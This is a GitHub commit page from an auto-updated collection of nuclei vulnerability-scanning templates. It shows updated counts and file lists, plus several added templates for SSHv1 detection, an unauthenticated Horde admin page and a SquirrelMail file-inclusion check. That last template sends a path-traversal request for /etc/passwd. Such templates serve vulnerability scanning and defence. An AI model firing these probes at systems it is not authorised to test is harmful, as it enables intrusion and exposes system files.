Skip to content

Commit

Permalink
Auto Updated
Browse files Browse the repository at this point in the history
  • Loading branch information
test committed Oct 25, 2024
1 parent 2b2d618 commit 5f465d3
Show file tree
Hide file tree
Showing 4,067 changed files with 687,517 additions and 185,506 deletions.
The diff you're trying to view is too large. We only load the first 3000 changed files.
119 changes: 56 additions & 63 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -20,72 +20,65 @@
| CVE-2016 | 252 |
| CVE-2017 | 404 |
| CVE-2018 | 451 |
| CVE-2019 | 523 |
| CVE-2020 | 606 |
| CVE-2021 | 1742 |
| CVE-2019 | 522 |
| CVE-2020 | 610 |
| CVE-2021 | 1741 |
| CVE-2022 | 2477 |
| CVE-2023 | 4801 |
| CVE-2024 | 5862 |
| Other | 25060 |
| CVE-2023 | 4803 |
| CVE-2024 | 5893 |
| Other | 25075 |
## 近几天数量变化情况
|2024-10-18 | 2024-10-19 | 2024-10-20 | 2024-10-21 | 2024-10-22 | 2024-10-23 | 2024-10-24|
|2024-10-19 | 2024-10-20 | 2024-10-21 | 2024-10-22 | 2024-10-23 | 2024-10-24 | 2024-10-25|
|--- | ------ | ------ | ------ | ------ | ------ | ---|
|43442 | 43612 | 43800 | 43795 | 43811 | 43846 | 43902|
|43612 | 43800 | 43795 | 43811 | 43846 | 43902 | 43952|
## 最近新增文件
| templates name |
| --- |
| CVE-2024-49621.yaml |
| CVE-2024-49326.yaml |
| CVE-2024-49605.yaml |
| CVE-2024-49335.yaml |
| CVE-2024-10250.yaml |
| CVE-2024-49617.yaml |
| CVE-2024-49324.yaml |
| CVE-2024-8542.yaml |
| CVE-2024-49331.yaml |
| CVE-2024-9947.yaml |
| CVE-2024-9927.yaml |
| CVE-2024-49604.yaml |
| CVE-2024-49330.yaml |
| CVE-2024-49607.yaml |
| CVE-2024-49327.yaml |
| CVE-2024-49622.yaml |
| CVE-2024-9829.yaml |
| CVE-2024-49611.yaml |
| CVE-2024-49328.yaml |
| CVE-2024-10045.yaml |
| CVE-2024-49610.yaml |
| CVE-2024-9617.yaml |
| CVE-2024-49629.yaml |
| CVE-2024-9530.yaml |
| CVE-2024-9583.yaml |
| CVE-2024-8500.yaml |
| CVE-2024-49332.yaml |
| CVE-2024-49325.yaml |
| CVE-2024-49329.yaml |
| olympic-panel.yaml |
| woocommerce-order-proposal.yaml |
| photokit.yaml |
| woostagram-connect.yaml |
| CNVD-2024-38747.yaml |
| danswer-panel.yaml |
| plms.yaml |
| apa-banner-slider.yaml |
| rest-api-fns.yaml |
| redpanda-console.yaml |
| wp-dropbox-dropins.yaml |
| TVE-2024-105272110.yaml |
| gradio-detect.yaml |
| apa-register-newsletter-form.yaml |
| affiliator-lite.yaml |
| back-link-tracker.yaml |
| transients-manager.yaml |
| lollms-webui-detect.yaml |
| endless-posts-navigation.yaml |
| nicebackgrounds.yaml |
| product-websites-showcase.yaml |
| googledrive-folder-list.yaml |
| nioland.yaml |
| sovratec-case-management.yaml |
| profilepress-pro.yaml |
| photo-gallery-builder.yaml |
| CVE-2024-49625.yaml |
| CVE-2024-8959.yaml |
| CVE-2024-49626.yaml |
| CVE-2024-9374.yaml |
| CVE-2024-9650.yaml |
| CVE-2024-49608.yaml |
| CVE-2024-8667.yaml |
| CVE-2024-49620.yaml |
| CVE-2024-9865.yaml |
| CVE-2024-49609.yaml |
| CVE-2024-9531.yaml |
| CVE-2024-49612.yaml |
| CVE-2024-8717.yaml |
| CVE-2024-9864.yaml |
| CVE-2024-49630.yaml |
| CVE-2024-49606.yaml |
| CVE-2024-9214.yaml |
| CVE-2024-10050.yaml |
| CVE-2024-9943.yaml |
| CVE-2024-49618.yaml |
| CVE-2024-49615.yaml |
| CVE-2024-10176.yaml |
| CVE-2024-49616.yaml |
| CVE-2024-49624.yaml |
| CVE-2024-10180.yaml |
| CVE-2024-49614.yaml |
| CVE-2024-49623.yaml |
| CVE-2024-49613.yaml |
| CVE-2024-49627.yaml |
| CVE-2024-49628.yaml |
| CVE-2024-49619.yaml |
| ferma-ru-net-checkout.yaml |
| social-link-groups.yaml |
| cf7-repeatable-fields.yaml |
| google-map-locations.yaml |
| sermonaudio-widgets.yaml |
| wp-image-seo.yaml |
| author-discussion.yaml |
| sw-contact-form.yaml |
| duplicate-title-validate.yaml |
| advanced-advertising-system.yaml |
| safetymails-forms.yaml |
| gerryworks-post-by-mail.yaml |
| rate-own-post.yaml |
| shipyaari-shipping-managment.yaml |
| simple-code-insert-shortcode.yaml |
| mytweetlinks.yaml |
| CVE-2023-40931.yaml |
3 changes: 2 additions & 1 deletion data.json
Original file line number Diff line number Diff line change
Expand Up @@ -229,5 +229,6 @@
"2024-10-21": 43795,
"2024-10-22": 43811,
"2024-10-23": 43846,
"2024-10-24": 43902
"2024-10-24": 43902,
"2024-10-25": 43952
}
50 changes: 49 additions & 1 deletion data1.json
Original file line number Diff line number Diff line change
Expand Up @@ -52110,5 +52110,53 @@
"nioland.yaml": "2024-10-24 02:29:39",
"sovratec-case-management.yaml": "2024-10-24 02:29:39",
"profilepress-pro.yaml": "2024-10-24 02:29:39",
"photo-gallery-builder.yaml": "2024-10-24 02:29:39"
"photo-gallery-builder.yaml": "2024-10-24 02:29:39",
"CVE-2024-49625.yaml": "2024-10-25 02:31:00",
"CVE-2024-8959.yaml": "2024-10-25 02:31:00",
"CVE-2024-49626.yaml": "2024-10-25 02:31:00",
"CVE-2024-9374.yaml": "2024-10-25 02:31:00",
"CVE-2024-9650.yaml": "2024-10-25 02:31:00",
"CVE-2024-49608.yaml": "2024-10-25 02:31:00",
"CVE-2024-8667.yaml": "2024-10-25 02:31:00",
"CVE-2024-49620.yaml": "2024-10-25 02:31:00",
"CVE-2024-9865.yaml": "2024-10-25 02:31:00",
"CVE-2024-49609.yaml": "2024-10-25 02:31:00",
"CVE-2024-9531.yaml": "2024-10-25 02:31:00",
"CVE-2024-49612.yaml": "2024-10-25 02:31:00",
"CVE-2024-8717.yaml": "2024-10-25 02:31:00",
"CVE-2024-9864.yaml": "2024-10-25 02:31:00",
"CVE-2024-49630.yaml": "2024-10-25 02:31:00",
"CVE-2024-49606.yaml": "2024-10-25 02:31:00",
"CVE-2024-9214.yaml": "2024-10-25 02:31:00",
"CVE-2024-10050.yaml": "2024-10-25 02:31:00",
"CVE-2024-9943.yaml": "2024-10-25 02:31:00",
"CVE-2024-49618.yaml": "2024-10-25 02:31:00",
"CVE-2024-49615.yaml": "2024-10-25 02:31:00",
"CVE-2024-10176.yaml": "2024-10-25 02:31:00",
"CVE-2024-49616.yaml": "2024-10-25 02:31:00",
"CVE-2024-49624.yaml": "2024-10-25 02:31:00",
"CVE-2024-10180.yaml": "2024-10-25 02:31:00",
"CVE-2024-49614.yaml": "2024-10-25 02:31:00",
"CVE-2024-49623.yaml": "2024-10-25 02:31:00",
"CVE-2024-49613.yaml": "2024-10-25 02:31:00",
"CVE-2024-49627.yaml": "2024-10-25 02:31:00",
"CVE-2024-49628.yaml": "2024-10-25 02:31:00",
"CVE-2024-49619.yaml": "2024-10-25 02:31:00",
"ferma-ru-net-checkout.yaml": "2024-10-25 02:31:00",
"social-link-groups.yaml": "2024-10-25 02:31:00",
"cf7-repeatable-fields.yaml": "2024-10-25 02:31:00",
"google-map-locations.yaml": "2024-10-25 02:31:00",
"sermonaudio-widgets.yaml": "2024-10-25 02:31:00",
"wp-image-seo.yaml": "2024-10-25 02:31:00",
"author-discussion.yaml": "2024-10-25 02:31:00",
"sw-contact-form.yaml": "2024-10-25 02:31:00",
"duplicate-title-validate.yaml": "2024-10-25 02:31:00",
"advanced-advertising-system.yaml": "2024-10-25 02:31:00",
"safetymails-forms.yaml": "2024-10-25 02:31:00",
"gerryworks-post-by-mail.yaml": "2024-10-25 02:31:00",
"rate-own-post.yaml": "2024-10-25 02:31:00",
"shipyaari-shipping-managment.yaml": "2024-10-25 02:31:00",
"simple-code-insert-shortcode.yaml": "2024-10-25 02:31:00",
"mytweetlinks.yaml": "2024-10-25 02:31:00",
"CVE-2023-40931.yaml": "2024-10-25 02:31:00"
}
1 change: 1 addition & 0 deletions links.csv
Original file line number Diff line number Diff line change
Expand Up @@ -492,3 +492,4 @@ https://github.com/karkis3c/bugbounty
https://github.com/biero-el-corridor/nuclei_template
https://github.com/tgr420/nuclei-templates
https://github.com/alibaykara/Nuclei-Templates-OWASP
https://github.com/cybershadowvps/coffinxp-nuclei-templates
26 changes: 0 additions & 26 deletions nuclei-templates/CVE-2001/CVE-2001-1473.yaml

This file was deleted.

29 changes: 29 additions & 0 deletions nuclei-templates/CVE-2001/cve-2001-1473.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
id: CVE-2001-1473

info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
remediation: Upgrade to SSH 2.4 or later.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cve-id: CVE-2001-1473
cwe-id: CWE-310

network:
- host:
- "{{Hostname}}"
- "{{Host}}:22"

matchers:
- type: word
words:
- "SSH-1"

# Updated by Chris on 2022/01/21
36 changes: 36 additions & 0 deletions nuclei-templates/CVE-2005/CVE-2005-3344.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,36 @@
id: CVE-2005-3344

info:
name: Horde Groupware Unauthenticated Admin Access
author: pikpikcu
severity: critical
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
tags: horde,unauth
remediation:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
classification:
cve-id: CVE-2005-3344

requests:
- method: GET
path:
- "{{BaseURL}}/horde/admin/user.php"
- "{{BaseURL}}/admin/user.php"
headers:
Content-Type: text/html

matchers-condition: and
matchers:

- type: word
words:
- "<title>Horde :: User Administration</title>"
condition: and

- type: status
status:
- 200

# Enhanced by mp on 2022/03/18
36 changes: 0 additions & 36 deletions nuclei-templates/CVE-2005/cve-2005-3344.yaml

This file was deleted.

31 changes: 0 additions & 31 deletions nuclei-templates/CVE-2006/CVE-2006-2842.yaml

This file was deleted.

25 changes: 25 additions & 0 deletions nuclei-templates/CVE-2006/cve-2006-2842.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2006-2842

info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
tags: cve2006,lfi,squirrelmail,cve

requests:
- method: GET
path:
- "{{BaseURL}}/src/redirect.php?plugins[]=../../../../etc/passwd%00"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:[x*]:0:0"

- type: status
status:
- 200
Loading

0 comments on commit 5f465d3

Please sign in to comment.